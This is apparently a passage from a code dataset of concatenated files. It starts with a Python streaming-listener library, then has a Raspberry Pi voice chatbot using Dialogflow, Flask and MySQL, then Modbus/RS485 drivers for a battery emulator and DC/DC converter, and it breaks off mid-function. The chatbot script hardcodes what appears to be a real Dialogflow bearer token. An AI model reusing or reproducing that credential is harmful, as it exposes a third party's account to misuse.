If not None, only keys from this variable will be stored.
"""
super(TextListener, self).__init__(obj)
file = obj.get('file', 'test.log')
encoding = obj.get('encoding', 'UTF-8')
buffering = obj.get('buffering', 1)
self.file = open(file, mode='a', encoding=encoding, buffering=buffering)
self.must_have_keys = obj.get('must_have_keys', ['url', 'nickname', 'written_at'])
self.formatstr = obj.get('formatstr', "{url}\t{nickname}\t{written_at}")
def listen(self, result):
for key in self.must_have_keys:
if key not in result:
result[key] = ''
result_str = self.formatstr.format(**result)
self.file.write(
result_str + '\n'
)
def close(self):
self.file.close()
```
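A minimal sketch of driving TextListener directly with a config dict. The keys mirror the ones read in __init__ above; the file name and format string are illustrative.
```python
# Sketch only: the file name and formatstr are illustrative values.
from birdman.listen.text import TextListener

listener = TextListener({
    "file": "stream.log",
    "encoding": "UTF-8",
    "buffering": 1,
    "must_have_keys": ["url", "nickname", "written_at"],
    "formatstr": "{url}\t{nickname}\t{written_at}",
})

# Missing must-have keys are back-filled with '' before formatting.
listener.listen({"url": "https://example.com/post/1", "nickname": "anon"})
listener.close()
```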
#### File: birdman/stream/base.py
```python
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import urllib3
import logging
from abc import ABCMeta, abstractmethod
class BirdmanStreamerError(Exception):
def __init__(self, message, streamer):
self.message = message
self.streamer = streamer
def __str__(self):
return "%s has crashed. \n%s" % (self.streamer, self.message)
class BaseStreamerConfig(object):
"""Config object for BaseStreamer.
"""
def __init__(self, obj):
"""
Args:
obj (dict): result of YAML parsing.
"""
self.verbose = bool(obj.get('verbose', 0))
class BaseStreamer(object):
"""BaseStreamer class contains:
Methods:
get_parser: returns initial argument parser
show_options: show options that can be used or parsed
set_logger: set logger configurations
stream: try asynchronous streaming using job method
"""
__metaclass__ = ABCMeta
def __init__(self, config_obj):
self.config = BaseStreamerConfig(config_obj)
def show_config(self):
"""Print out config available and predefined values."""
string = 'Configuration for <%s>\n' % (self.config.name)
for attr, value in sorted(vars(self.config).items()):
string += " {} = {}\n".format(attr, value)
self.logger.info(string)
def set_logger(self, stream=None, filename=None):
# logger
self.logger = logging.getLogger('asyncio.koshort.stream.' + self.config.name)
if self.config.verbose:
self.logger.setLevel(logging.DEBUG)
else:
self.logger.setLevel(logging.WARNING)
# Formatter
formatter = logging.Formatter('[%(levelname)s] ' + self.config.name
+ ' %(asctime)s | %(message)s\n')
# Handler
handler = logging.StreamHandler(stream)
handler.setFormatter(formatter)
self.logger.addHandler(handler)
if filename is not None:
if isinstance(filename, str):
filename = [filename]
for file in filename:
handler = logging.FileHandler(file, mode='a', encoding='UTF-8')
handler.setFormatter(formatter)
self.logger.addHandler(handler)
async def stream(self):
if self.config.verbose:
self.show_config()
try:
async for result in self.job():
yield self.config.name, result
except urllib3.exceptions.ProtocolError:
self.logger.warning("ProtocolError has raised but continue to stream.")
self.stream()
except RecursionError:
self.logger.error("RecursionError; too much retries")
return
@abstractmethod
async def job(self):
'''Must override as a generator(i.e. yield not return).
Generate one result at a time.
'''
pass
@abstractmethod
async def close(self):
'''Must override.
How to properly close this streamer?
'''
pass
```
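A hedged sketch of a concrete streamer built on BaseStreamer above: job() must be an async generator and close() must release resources. Setting config.name is an assumption based on how set_logger() and show_config() use it; the yielded dicts are illustrative.
```python
# Sketch only: a toy streamer that emits a few canned results and then stops.
import asyncio
from birdman.stream.base import BaseStreamer


class EchoStreamer(BaseStreamer):
    def __init__(self, config_obj):
        super(EchoStreamer, self).__init__(config_obj)
        # set_logger()/show_config() read config.name, so give the config one here.
        self.config.name = config_obj.get('name', 'echo')
        self.set_logger()

    async def job(self):
        # job() is consumed by BaseStreamer.stream(), which yields (name, result) pairs.
        for i in range(3):
            await asyncio.sleep(0.1)
            yield {'url': 'https://example.com/%d' % i, 'nickname': 'echo'}

    async def close(self):
        pass


async def demo():
    streamer = EchoStreamer({'verbose': 1, 'name': 'echo'})
    async for name, result in streamer.stream():
        print(name, result)
    await streamer.close()

asyncio.run(demo())
```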
#### File: examples/cyber_patrol_assistant/main.py
```python
from birdman import init_birdman_from_yaml
from birdman.listen import register_listener
from birdman.listen.text import TextListener
@register_listener('title_body')
class TitleBodyListener(TextListener):
"""TitleBodyListener records the result dict in given format to the desired file.
formatstr decides your desired text format.
It is directly fed to built-in format() function, so check "python format() named placeholder syntax" for good.
"""
def __init__(self, obj):
"""
Args:
file, encoding, bufsize: Equal to python built-in `open()`
keys: Iterable(str).
If not None, only keys from this variable will be stored.
"""
super(TitleBodyListener, self).__init__(obj)
self.must_have_keys = ['title', 'body']
self.formatstr = obj.get('formatstr', "{title}▁{body}")
def listen(self, result):
result['body'] = result['body'].replace('\n', ' ')
super(TitleBodyListener, self).listen(result)
def main():
riggan = init_birdman_from_yaml('examples/cyber_patrol_assistant/config.yaml', 'auth.yaml')
riggan.start()
if __name__ == "__main__":
main()
``` |
{
"source": "jinuoh2003/TrafficLightML",
"score": 2
} |
#### File: jinuoh2003/TrafficLightML/chatbot.py
```python
import argparse
import locale
import logging
from aiy.board import Board, Led
from aiy.cloudspeech import CloudSpeechClient
from google.cloud import texttospeech
from pygame import mixer
import time
import requests
import os
import json
from flask import Flask, request, jsonify,redirect
#databse mysql
import pymysql.cursors
#Configure db
conn = pymysql.connect(host='127.0.0.1',user='pi',password='<PASSWORD>',charset='utf8mb4')
client = texttospeech.TextToSpeechClient()
def get_answer(text, user_key):
print("get_answer... start")
data_send = {
'query': text,
'sessionId': user_key,
'lang': 'en',
}
data_header = {
'Authorization': 'Bearer 4e7da793a9ce4a57b2cd113bd2a7ebf2',
#'Authorization': 'Bearer 56b4c79017514fb6a27a45ce43bc21a3', ## jjangphal
'Content-Type': 'application/json; charset=utf-8'
}
dialogflow_url = 'https://api.dialogflow.com/v1/query?v=20150910'
res = requests.post(dialogflow_url, data=json.dumps(data_send), headers=data_header)
if res.status_code != requests.codes.ok:
return 'An error has occurred.'
data_receive = res.json()
print (json.dumps(data_receive,indent=4))
answer = data_receive['result']['fulfillment']['speech']
parameters = data_receive['result']['parameters']
if parameters :
city = data_receive['result']['parameters']['local-city']
print("local-city:" + city)
return answer
app = Flask(__name__)
app.config['JSON_AS_ASCII'] = False
@app.route('/', methods=['POST', 'GET'])
def webhook():
content = request.args.get('content')
userid = request.args.get('userid')
return get_answer(content, userid)
def tts_answer(answer):
# Set the text input to be synthesize
synthesis_input = texttospeech.types.SynthesisInput(text = answer)
count = len(str(synthesis_input))/18 ### english 18
print ("count" + str(count))
voice = texttospeech.types.VoiceSelectionParams(
language_code='en-US',
ssml_gender=texttospeech.enums.SsmlVoiceGender.NEUTRAL)
# Select the type of audio file you want returned
audio_config = texttospeech.types.AudioConfig(audio_encoding=texttospeech.enums.AudioEncoding.MP3)
# Perform the text-to-speech request on the text input with the selected
# voice parameters and audio file type
response = client.synthesize_speech(synthesis_input, voice, audio_config)
# The response's audio_content is binary.
with open('output.mp3', 'wb') as out:
# Write the response to the output file.
out.write(response.audio_content)
print('Audio content written to file "output.mp3"')
#os.system("omxplayer -o alsa output.mp3")
mixer.init()
mixer.music.load('output.mp3')
mixer.music.play(0)
time.sleep(count)
print ("SOUND GOOD~~")
def get_hints(language_code):
if language_code.startswith('en_'):
return ('turn on the light',
'turn off the light',
'blink the light',
'goodbye')
return None
def locale_language():
language, _ = locale.getdefaultlocale()
language = 'en_US'
print("start:" +language)
return language
def main():
logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser(description='Assistant service example.')
parser.add_argument('--language', default=locale_language())
args = parser.parse_args()
logging.info('Initializing for language %s...', args.language)
hints = get_hints(args.language)
client = CloudSpeechClient()
tts_answer("Now, Tell me please.")
with Board() as board:
while True:
text = client.recognize(language_code=args.language,
hint_phrases=hints)
if text is None:
tts_answer('Sorry, I did not hear you.')
print('Sorry, I did not hear you.')
else :
print("I: "+ text)
if "good bye" in text or "bye" in text or 'by' in text :
print("Thank you. Bye~")
tts_answer('Thank you. Goodbye.')
break
# save db (I text)
try:
with conn.cursor() as cursor:
sql = 'INSERT INTO aiy.chat(content) VALUES(%s)'
cursor.execute(sql,("I: "+text))
conn.commit()
print("save:{}".format(cursor.lastrowid))
except:
print("DB1 에러")
#### print answer
answer = get_answer(text,'jp')
print('Chatbot: "', answer, '"')
#### save db (chatbot text)
try:
with conn.cursor() as cursor:
sql = 'INSERT INTO aiy.chat(content) VALUES(%s)'
cursor.execute(sql,("Chatbot: "+answer))
conn.commit()
except:
print("DB1 error")
tts_answer(answer)
if __name__ == '__main__':
main()
``` |
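The webhook route above exposes the Dialogflow lookup over HTTP via the content and userid query parameters. A hedged sketch of calling it, assuming the Flask app is being served separately (the __main__ block above starts the voice loop, not the web server); host and port are placeholders.
```python
# Sketch only: host/port are placeholders; the query parameter names match webhook() above.
import requests

resp = requests.get("http://localhost:5000/",
                    params={"content": "turn on the light", "userid": "user-1"})
print(resp.text)
```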
{
"source": "jinupygogo/apis-dcdc_batt_comm",
"score": 2
} |
#### File: drivers/battery_emulator/__init__.py
```python
import time
import pymodbus
from essx.essx_exception import ESSXDeviceException
# Interval for fetching RSOC etc. No modbus command is issued until this much time has elapsed.
# Setting this to 0 always issues the command.
T = 0
class BatteryEmulator(object):
def __init__(self, dev = None, modbus_adr_rsoc = None, modbus_adr_status = None, unit = 0x1):
"""
:param pymodbus.client.sync.ModbusSerialClient dev: device
:param int modbus_adr_rsoc: address of the RSOC register
:param int modbus_adr_status: address of the STATUS register
:param int unit: UNIT
"""
self.dev = dev #
self.modbus_adr_rsoc = modbus_adr_rsoc
self.modbus_adr_status = modbus_adr_status
self.unit = unit
self._rsoc = 0.0
self._status = 1
self._rsoc_ts = 0
self._status_ts = 0
def read_rsoc(self):
"""
Get the RSOC.
:return RSOC: 0 - 100.0
:rtype float:
remote_rsoc must have been executed beforehand.
"""
return self._rsoc / 10.0
def read_status(self):
"""
Get the status.
:return: 1 if power interchange is allowed, 0 if not
:rtype int:
Note that the meaning is inverted relative to the requirement spec, where the
corresponding modbus register is 0 when interchange is allowed and 1 when it is not.
remote_status must have been executed beforehand.
"""
return 0 if (self._status & 0x1) == 1 else 1
def remote_rsoc_and_status(self):
""" rsocと statusのアドレスが隣りあってるときは一回で取得する """
if self._rsoc_ts > time.time() - T and self._status_ts > time.time() - T:
return
rr = self.dev.read_input_registers(self.modbus_adr_rsoc, 2, unit = self.unit)
if isinstance(rr, pymodbus.exceptions.ModbusIOException):
raise ESSXDeviceException("modbus io exception")
self._rsoc = rr.getRegister(0)
self._status = rr.getRegister(1)
self._rsoc_ts = time.time()
self._status_ts = time.time()
def remote_rsoc(self):
""" rsocを取得するコマンドを発行する """
if self.modbus_adr_status - self.modbus_adr_rsoc == 1:
self.remote_rsoc_and_status()
return
if self._rsoc_ts > time.time() - T:
return
rr = self.dev.read_input_registers(self.modbus_adr_rsoc, 1, unit = self.unit)
if isinstance(rr, pymodbus.exceptions.ModbusIOException):
raise ESSXDeviceException("modbus io exception")
self._rsoc = rr.getRegister(0)
self._rsoc_ts = time.time()
def remote_status(self):
""" statusを取得するコマンドを発行する """
if self._status_ts > time.time() - T:
return
rr = self.dev.read_input_registers(self.modbus_adr_status, 1, unit = self.unit)
if isinstance(rr, pymodbus.exceptions.ModbusIOException):
raise ESSXDeviceException("modbus io exception")
self._status = rr.getRegister(0)
self._status_ts = time.time()
def check_battery(self):
"""
:return: a tuple of (rsoc, bos, commerr)
:rtype tuple:
rsoc is a float from 0.0 to 100.0
bos is 0: interchange not allowed, 1: charge only, 2: discharge only, 3: interchange allowed
commerr is 0 when communication succeeded and -1 when a communication error occurred
Only 0 and 3 are returned for bos.
"""
rsoc = 0
bos = 0
comm_err1 = -1
comm_err2 = -1
retry = 2
while retry > 0:
try:
self.remote_rsoc()
rsoc = self.read_rsoc()
comm_err1 = 0
break
except pymodbus.exceptions.ModbusIOException:
time.sleep(0.5)
retry = retry - 1
rsoc = 0
retry = 2
while retry > 0:
try:
self.remote_status()
bos = 0 if self.read_status() == 0 else 3
comm_err2 = 0
break
except pymodbus.exceptions.ModbusIOException:
time.sleep(0.5)
retry = retry - 1
bos = 0
if comm_err1 == 0 and comm_err2 == 0:
comm_err = 0
else:
comm_err = -1
return (rsoc, bos, comm_err)
# To run this standalone test, add the parent directory to PYTHONPATH
if __name__ == "__main__":
from pymodbus.client.sync import ModbusSerialClient as ModbusClient
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--device', default = "/dev/ttyO4")
parser.add_argument('--speed', default = 9600, type = int)
parser.add_argument('--unit', default = 1, type = int)
args = parser.parse_args()
print("device={}".format(args.device))
print("speed={}".format(args.speed))
print("unit={}".format(args.unit))
client = ModbusClient(method='rtu', port=args.device, timeout=1, baudrate=args.speed)
client.connect()
emubat = BatteryEmulator(dev = client, modbus_adr_rsoc = 0x1d, modbus_adr_status = 0x1e, unit = args.unit)
emubat.remote_rsoc()
mes = emubat.read_rsoc()
if mes != None:
print("rsoc={}".format(mes))
time.sleep(0.1)
emubat.remote_status()
mes = emubat.read_status()
if mes != None:
print("status={}".format(mes))
time.sleep(0.1)
print(emubat.check_battery())
```
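A minimal polling sketch for the class above; the device path, baud rate, register addresses and import path are assumptions copied from the `__main__` block, and the interpretation of the returned tuple follows the `check_battery` docstring.
```python
# Hypothetical polling sketch; port, baudrate, register addresses and import path are assumptions.
from pymodbus.client.sync import ModbusSerialClient as ModbusClient
from battery_emulator import BatteryEmulator

client = ModbusClient(method='rtu', port='/dev/ttyO4', timeout=1, baudrate=9600)
client.connect()
bat = BatteryEmulator(dev=client, modbus_adr_rsoc=0x1d, modbus_adr_status=0x1e, unit=1)

rsoc, bos, comm_err = bat.check_battery()
if comm_err != 0:
    print("battery communication error")
elif bos == 3:
    print("interchange allowed, RSOC = {} %".format(rsoc))
else:
    print("interchange not allowed, RSOC = {} %".format(rsoc))
```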
#### File: drivers/essx/essx_global.py
```python
class ESSXGlobal:
saved_params = {
0: {}
}
@classmethod
def has(cls, unit, key):
if not unit in cls.saved_params:
return False
return key in cls.saved_params[unit]
@classmethod
def put(cls, unit, key, value):
if not unit in cls.saved_params:
cls.saved_params[unit] = {}
cls.saved_params[unit][key] = value
@classmethod
def get(cls, unit, key):
if not unit in cls.saved_params:
return False
return cls.saved_params[unit][key]
@classmethod
def reset(cls, unit):
cls.saved_params = {
unit: {}
}
```
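A small usage sketch of the cache above, mirroring how essx_server.py stores the last accepted set-points; the values are hypothetical and the `essx` package is assumed to export `ESSXGlobal` the way essx_server.py uses it.
```python
# Hypothetical values; unit 0 is the only unit essx_server.py uses.
import essx

essx.ESSXGlobal.put(0, 'dvg', 380.0)      # remember the last grid target voltage
essx.ESSXGlobal.put(0, 'drg', 0.2)        # ... and the droop rate

if essx.ESSXGlobal.has(0, 'dvg'):
    dvg = essx.ESSXGlobal.get(0, 'dvg')   # -> 380.0

essx.ESSXGlobal.reset(0)                  # drop every cached value for unit 0
```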
#### File: drivers/essx/essx_rs485.py
```python
import sys
import serial
import serial.rs485
#import time
import binascii
import copy
try:
import Adafruit_BBIO.GPIO as GPIO
except:
print("This IoT board isn't BBB.")
class ESSXRS485(serial.Serial):
def __init__(self, *args, **kwargs):
if 'dir_pin' in kwargs:
self.dir_pin = kwargs['dir_pin']
kwargs = copy.copy(kwargs)
del kwargs['dir_pin']
else:
self.dir_pin = "P8_9"
print("dir_pin: {}".format(self.dir_pin))
super(ESSXRS485, self).__init__(*args, **kwargs)
if self.dir_pin != "not_used":
GPIO.setup(self.dir_pin, GPIO.OUT)
GPIO.output(self.dir_pin, GPIO.LOW)
self.reset_input_buffer()
# def read(self, size = 1):
# GPIO.output(self.dir_pin, GPIO.LOW)
# res = super(ESSXRS485, self).read(size)
# if res != None:
# print("READ LEN={}".format(len(res)))
# print("READ LEN={}".format(binascii.hexlify(res)))
# else:
# print("READ TIMEOUT")
#
# return res
def write(self, b):
if self.dir_pin != "not_used":
GPIO.output(self.dir_pin, GPIO.HIGH)
_len = super(ESSXRS485, self).write(b)
self.flush()
self.reset_input_buffer()
if self.dir_pin != "not_used":
GPIO.output(self.dir_pin, GPIO.LOW)
return _len
if __name__ == "__main__":
import sys
import argparse
import binascii
parser = argparse.ArgumentParser()
parser.add_argument('--device', default = "/dev/ttyO2")
parser.add_argument('--speed', default = "9600")
parser.add_argument('command', choices = ['send', 'recv', 'sendrecv'])
args = parser.parse_args()
if args.device == "/dev/ttyO2": #for BBB
a = ESSXRS485(args.device, int(args.speed), dir_pin = 'P8_7')
elif args.device == "/dev/ttyO4": #for BBB
a = ESSXRS485(args.device, int(args.speed), dir_pin = 'P8_7')
elif args.device == "/dev/ttyO5": #for BBB
a = ESSXRS485(args.device, int(args.speed), dir_pin = 'P8_9')
if args.command == 'recv':
print("waiting..")
print(a.read(8))
elif args.command == 'send':
data = b"ABCDEFGH"
print("sending " + str(len(b"ABCDEFGH")) + " bytes data")
a.write(data)
elif args.command == 'sendrecv':
data = b"ABCDEFGH"
print("sending " + str(len(b"ABCDEFGH")) + " bytes data")
a.write(data)
print("waiting..")
print(binascii.hexlify(a.read(8)))
while True:
print(binascii.hexlify(a.read(1)))
```
#### File: drivers/essx/essx_type_oes.py
```python
import time
from essx.essx_exception import ESSXTimeoutException, ESSXValueException, ESSXChecksumException, ESSXDeviceException
import eza2500
from essx import essx_util
import threading
from essx import essx_debug
class ESSXTypeOES:
"""
Controller class that mediates between the REST API and the device.
"""
def __init__(self, dcdc_dev = None, bat_dev = None, dcdc_config = None, bat_config = None, ad1 = 0, ad2 = 1, name = None):
self.dcdc_config = dcdc_config
self.bat_config = bat_config
self.dcdc_dev = dcdc_dev
self.bat_dev = bat_dev
self.ad1 = ad1
self.ad2 = ad2
self.name = name
self.com0101 = eza2500.Command0101(self.dcdc_dev)
self.com0201 = eza2500.Command0201(self.dcdc_dev)
self.com0301 = eza2500.Command0301(self.dcdc_dev)
self.com0304 = eza2500.Command0304(self.dcdc_dev)
self.com0401 = eza2500.Command0401(self.dcdc_dev)
self.com0601 = eza2500.Command0601(self.dcdc_dev)
self.com0701 = eza2500.Command0701(self.dcdc_dev)
self.com0901 = eza2500.Command0901(self.dcdc_dev)
self.com1001 = eza2500.Command1001(self.dcdc_dev)
self.com0104 = eza2500.Command0104(self.dcdc_dev)
self.com0404 = eza2500.Command0404(self.dcdc_dev)
self.com0604 = eza2500.Command0604(self.dcdc_dev)
self.com0704 = eza2500.Command0704(self.dcdc_dev)
self.com0904 = eza2500.Command0904(self.dcdc_dev)
self.battery_watchdog_running = True
self.battery_watchdog_thread = threading.Thread(target = self._battery_watchdog)
self.battery_watchdog_thread.daemon = True
self.battery_watchdog_thread.start()
def vrfy(self, obj, params = {}):
"""
Verify that the command parameters are valid.
"""
obj.pack_senddata(self.ad1, self.ad2, params)
def run(self, obj, params = {}):
"""
Send a command and receive the response.
Retry if an error occurs.
The number of retries is configured via EssCommConfig.
"""
if 'number_of_dcdc_error_retry' in self.dcdc_config:
retry = int(self.dcdc_config['number_of_dcdc_error_retry'])
else:
retry = 0
if 'number_of_timeout_retry' in self.dcdc_config:
timeout_retry = int(self.dcdc_config['number_of_timeout_retry'])
else:
timeout_retry = 0
if 'wait_retry' in self.dcdc_config:
wait_retry = int(self.dcdc_config['wait_retry'])
else:
wait_retry = 0.1
retry += 1
timeout_retry += 1
while retry > 0 and timeout_retry > 0:
try:
obj.send(self.ad1, self.ad2, params)
obj.recv()
time.sleep(0.062)
return
except ESSXTimeoutException as err:
print("timeout retry: " + str(timeout_retry))
timeout_retry = timeout_retry - 1
if timeout_retry == 0:
raise
time.sleep(wait_retry)
except ESSXValueException as err:
print("value exception retry: " + str(retry))
retry = retry - 1
if retry == 0:
raise
time.sleep(wait_retry)
except ESSXChecksumException as err:
print("checksum exception retry: " + str(retry))
retry = retry - 1
if retry == 0:
raise
time.sleep(wait_retry)
except ESSXDeviceException as err:
_ercd = obj.response['ercd']
if _ercd == 0xffff: # the received command is not supported
raise
elif _ercd == 0xfffe: # invalid command parameter
raise
elif _ercd == 0xfffd: # normal, but the command cannot be accepted right now
pass
elif _ercd == 0xfffc: # system busy
pass
elif _ercd == 0xfffb: # internal communication error
raise
retry = retry - 1
if retry == 0:
raise ESSXTimeoutException('timeout')
time.sleep(wait_retry)
# should not be reached, kept as a safeguard
raise ESSXTimeoutException('timeout')
def _check_battery(self):
if self.bat_dev == None:
return (0, 0, -1)
else:
return self.bat_dev.check_battery()
# rsoc = 0
# bos = 0
# comm_err1 = -1
# comm_err2 = -1
#
# retry = 2
# while retry > 0 and self.bat_dev != None:
# mes = self.bat_dev.read_rsoc()
# # is this data from within the last minute? (whether this threshold is appropriate is open to review)
# if mes != None and mes.timestamp > time.time() - 60:
# rsoc = (mes.data[2] + mes.data[3] * 256) / 10.0
# comm_err1 = 0
# break
# else:
# self.bat_dev.remote_rsoc()
# time.sleep(0.5)
# retry = retry - 1
# rsoc = 0
#
# retry = 2
# while retry > 0 and self.bat_dev != None:
# mes = self.bat_dev.read_status()
# # is this data from within the last minute? (whether this threshold is appropriate is open to review)
# if mes != None and mes.timestamp > time.time() - 60:
# if mes.data[0] == 1:
# bos = 3
# else:
# bos = 0
# comm_err2 = 0
# break
# else:
# self.bat_dev.remote_status()
# time.sleep(0.5)
# retry = retry - 1
# bos = 0
#
# if comm_err1 == 0 and comm_err2 == 0:
# comm_err = 0
# else:
# comm_err = -1
# return (rsoc, bos, comm_err)
def _battery_watchdog(self):
"""
Check once every 10 seconds whether the battery allows interchange.
"""
essx_debug.log("watchdog start")
while self.battery_watchdog_running:
if self.bat_config == None:
time.sleep(10)
continue
essx_debug.log("watchdog")
essx_debug.log(self.bat_config['config'])
if 'force_dcdc_waiting' in self.bat_config['config'] and self.bat_config['config']['force_dcdc_waiting'] == True:
(rsoc, bos, comm_err) = self._check_battery()
essx_debug.log("rsoc " +str(rsoc))
essx_debug.log("bos " +str(bos))
if bos == 0:
essx_debug.log("->waiting")
self.run(self.com0104, {
'mode': self.checkOperationMode_2500(0)
})
time.sleep(10)
essx_debug.log("watchdog stop")
# /1/log/data
def log_data(self, params):
_dcdc_conf = self.dcdc_config['config']
_bat_conf = self.bat_config['config']
(rsoc, bos, comm_err) = self._check_battery()
if comm_err == -1:
raise ESSXDeviceException('comm error')
# if bos == 0:
# if 'force_dcdc_waiting' in self.bat_config['config'] and self.bat_config['config']['force_dcdc_waiting'] == True:
# self.run(self.com0104, {
# 'mode': self.checkOperationMode_2500(0)
# })
return {
"system_time": {
"year": 0,
"month": 0,
"day": 0,
"hour": 0,
"minute": 0
},
"rsoc": float(rsoc),
"dischargeable_time": {
"hour": 0,
"minute": 0
},
"battery_voltage": _bat_conf['battery_voltage'],
"battery_current": _bat_conf['battery_current'],
"battery_rsoc" : float(rsoc),
"battery_status": 0,
"battery_warning": 0,
#"battery_alarm": 0
"battery_operation_status": bos,
"battery_comm_err": comm_err,
"charge_discharge_power": _bat_conf['battery_voltage'] * _bat_conf['battery_current'],
"ups_operation_schedule": 0,
"ups_operation_mode": {
"mode": 0,
"parameter": 0,
"stop_mode": 0
},
#"ups_input_voltage": res["ac_input_voltage"],
#"ups_output_voltage": res["ac_output_voltage"],
#"ups_output_current": res["ac_output_current_r"] + res["ac_output_current_s"],
#"ups_output_frequency": res["ac_output_frequency"],
#"ups_output_power": res["ac_output_power"],
#"pvc_charge_voltage": res["pvc_charge_voltage"],
#"pvc_charge_current": res["pvc_charge_current"],
#"pvc_charge_power": res["pvc_charge_power"],
#"pvc_alarm": res["pvc_alarm"],
#"ups_alarm": res["inverter_alarm"]
}
def remote_ioctl_set(self, params):
_conf = self.dcdc_config['config']
# The EZA2500 requires DIG and CIB to be specified in command 6-4. CIB comes from the
# configuration, but DIG does not, so fetch its current value with command 6-1 first.
self.run(self.com0601)
self.run(self.com0604, {
'ubv': _conf['ubv'],
'ugv': _conf['ugv'],
'obv': _conf['obv'],
'ogv': _conf['ogv'],
'cib': _conf['cib'],
'dig': self.com0601.response['dig']
})
self.run(self.com0704, {
'bcf': essx_util.strToNum(_conf['bcf']),
'cvb': _conf['cvb'], #tvb => cvb
'dlb': _conf['dlb'], #lbv => dlb
'cdb': _conf['cdb'], #cud => cdb
'ddb': _conf['ddb'], #dld => ddb
})
self.run(self.com0304, {
'cvb': _conf['cvb'],
'drb': _conf['drb'],
})
res = {}
res["dcdc_converter_name"] = self.name
# return the values that were set, not the values echoed back by the device
res["dcdc_setup_parameter"] = {
"ubv": _conf['ubv'],
"ugv": _conf['ugv'],
"obv": _conf['obv'],
"ogv": _conf['ogv'],
"bcf": "0x" + ("%04x" % _conf['bcf']),
"cvb": _conf['cvb'],
"dlb": _conf['dlb'],
"cdb": _conf['cdb'],
"ddb": _conf['ddb'],
"drb": _conf['drb'],
"cib": _conf['cib'],
#"lbd": _conf['lbd']
}
return res
def remote_ioctl_get(self, params):
_res_log_data = self.log_data(params)
_res_remote_get = self.remote_get(params)
return {
"status": _res_remote_get["status"],
"powermeter": _res_remote_get["powermeter"],
"meter": _res_remote_get["meter"],
"vdis": _res_remote_get["vdis"],
"param": _res_remote_get["param"],
"system_time": _res_log_data["system_time"],
"rsoc": _res_log_data["rsoc"],
"dischargeable_time": _res_log_data["dischargeable_time"],
"battery_voltage": _res_log_data["battery_voltage"],
"battery_current": _res_log_data["battery_current"],
"battery_rsoc" : _res_log_data["battery_rsoc"],
"battery_status": _res_log_data["battery_status"],
"battery_warning": _res_log_data["battery_warning"],
#"battery_alarm": 0
"battery_operation_status": _res_log_data["battery_operation_status"],
"battery_comm_err": _res_log_data["battery_comm_err"],
"charge_discharge_power": _res_log_data["charge_discharge_power"],
"ups_operation_schedule": _res_log_data["ups_operation_schedule"],
"ups_operation_mode": _res_log_data["ups_operation_mode"],
#"ups_input_voltage": res["ac_input_voltage"],
#"ups_output_voltage": res["ac_output_voltage"],
#"ups_output_current": res["ac_output_current_r"] + res["ac_output_current_s"],
#"ups_output_frequency": res["ac_output_frequency"],
#"ups_output_power": res["ac_output_power"],
#"pvc_charge_voltage": res["pvc_charge_voltage"],
#"pvc_charge_current": res["pvc_charge_current"],
#"pvc_charge_power": res["pvc_charge_power"],
#"pvc_alarm": res["pvc_alarm"],
#"ups_alarm": res["inverter_alarm"]
}
def remote_get(self, params):
_conf = self.dcdc_config['config']
self.run(self.com0101, {})
self.run(self.com0201, {})
self.run(self.com0401, {})
self.run(self.com0901, {})
self.run(self.com1001, {})
self.run(self.com0601, {})
res = {}
res["operationMode"] = self.com0101.response['mode']
res["alarmState"] = (self.com0201.response['cst'] & 0xc) >> 2
res["alarm"] = (self.com0901.response['alm1'])
res["status"] = (self.com0201.response['cst'] & 0x3)
res["wg"] = round(self.com1001.response['wg'], 16)
res["tmp"] = round(self.com1001.response['tmp'],16)
res["vb"] = round(self.com1001.response['vb'], 16)
res["wb"] = round(self.com1001.response['wb'], 16)
res["vg"] = round(self.com1001.response['vg'], 16)
res["ib"] = round(self.com1001.response['ib'], 16)
res["ig"] = round(self.com1001.response['ig'], 16)
res["dvg"] = round(self.com0401.response['dvg'], 16) #tgv => dvg
res["drg"] = round(self.com0401.response['drg'], 16)
res["dig"] = round(self.com0601.response['dig'], 16) #lgc, lgd => dig
return {
"status": {
"status": "0x" + ('%04x' % res["operationMode"]),
"alarmState": essx_util.alarmStateStr(res["alarmState"]),
"statusName": "Ignore",
"alarm": essx_util.alarmStr(res["status"], res["alarmState"], res["alarm"]),
"runningState": essx_util.runningStateStr(res['status']),
"operationMode": essx_util.operationModeStr(res["operationMode"]),
},
"powermeter": {
"p2": 0,
"p1": 0,
"v1": 0,
"kwh2": 0,
"kwh1": 0,
"i1": 0
},
"meter": {
"wg": res["wg"],
"tmp": res["tmp"],
"vb": res["vb"],
"wb": res["wb"],
"vg": res["vg"],
"ib": res["ib"],
"ig": res["ig"]
},
"vdis": {
"dvg": res["dvg"],
"drg": res["drg"]
},
"param": {
'cib': _conf['cib'],
'ubv': _conf['ubv'],
"dig": res["dig"],
'ogv': _conf['ogv'],
'obv': _conf['obv'],
'ugv': _conf['ugv'],
}
}
def remote_get_status(self, params):
self.run(self.com0101)
self.run(self.com0201)
self.run(self.com1001)
res = {}
res["operationMode"] = self.com0101.response['mode']
res["alarmState"] = (self.com0201.response['cst'] & 0xc) >> 2
res["status"] = (self.com0201.response['cst'] & 0x3)
res["wg"] = round(self.com1001.response['wg'], 16)
res["tmp"] = round(self.com1001.response['tmp'], 16)
res["vb"] = round(self.com1001.response['vb'], 16)
res["wb"] = round(self.com1001.response['wb'], 16)
res["vg"] = round(self.com1001.response['vg'], 16)
res["ib"] = round(self.com1001.response['ib'], 16)
res["ig"] = round(self.com1001.response['ig'], 16)
return {
"status": {
"alarmState": essx_util.alarmStateStr(res["alarmState"]),
"runningState": essx_util.runningStateStr(res['status']),
"operationMode": essx_util.operationModeStr(res["operationMode"]),
},
"meter": {
"wg": res["wg"],
"tmp": res["tmp"],
"vb": res["vb"],
"wb": res["wb"],
"vg": res["vg"],
"ib": res["ib"],
"ig": res["ig"]
},
}
def remote_set(self, params):
"""
The following parameters are required:
params['mode']
params['dvg']
params['drg']
params['dig']
'mode' is specified as a hexadecimal string (an EZA2500 value).
It is passed through without conversion.
"""
_conf = self.dcdc_config['config']
_local_current_mode = params['current_mode'] ##############Added for v1.3 2018/11/14##################
self.vrfy(self.com0404, {
'dvg': params['dvg'], 'drg': params['drg']
})
self.vrfy(self.com0604, {
'ubv': _conf['ubv'],
'ugv': _conf['ugv'],
'obv': _conf['obv'],
'ogv': _conf['ogv'],
'cib': _conf['cib'],
'dig': params['dig'],
})
self.vrfy(self.com0104, {
'mode': self.checkOperationMode_2500(essx_util.hexStrToInt(params['mode']))
})
############# Added for v1.3 2018/11/14: change the order in which commands are issued depending on the current mode. ###################
##########################################↓↓↓#########################################################
